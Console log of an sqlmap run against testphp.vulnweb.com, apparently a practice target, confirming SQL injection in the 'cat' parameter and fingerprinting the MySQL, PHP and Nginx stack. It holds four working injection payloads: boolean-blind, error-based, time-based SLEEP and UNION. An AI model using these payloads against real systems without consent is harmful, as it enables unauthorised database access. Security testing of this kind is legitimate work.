        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.3.13#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:28:50 /2024-04-02/

[1/1] URL:
GET http://testphp.vulnweb.com/listproducts.php?cat=1
do you want to test this URL? [Y/n/q]
> Y
[23:28:50] [INFO] testing URL 'http://testphp.vulnweb.com/listproducts.php?cat=1'
[23:28:50] [INFO] resuming back-end DBMS 'mysql' 
[23:28:50] [INFO] using '/Users/min/.local/share/sqlmap/output/results-04022024_1128pm.csv' as the CSV results file in multiple targets mode
[23:28:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 9179=9179

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: cat=1 AND GTID_SUBSET(CONCAT(0x7162787171,(SELECT (ELT(4926=4926,1))),0x717a7a7871),4926)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cat=1 AND (SELECT 9205 FROM (SELECT(SLEEP(5)))AmqV)

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162787171,0x4143725672454556666d4d4544474d62696e4e674d55437446544d686279745162706d5447645252,0x717a7a7871),NULL,NULL,NULL-- -
---
do you want to exploit this SQL injection? [Y/n] Y
[23:28:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.6
[23:28:51] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/Users/min/.local/share/sqlmap/output/results-04022024_1128pm.csv'

[*] ending @ 23:28:51 /2024-04-02/

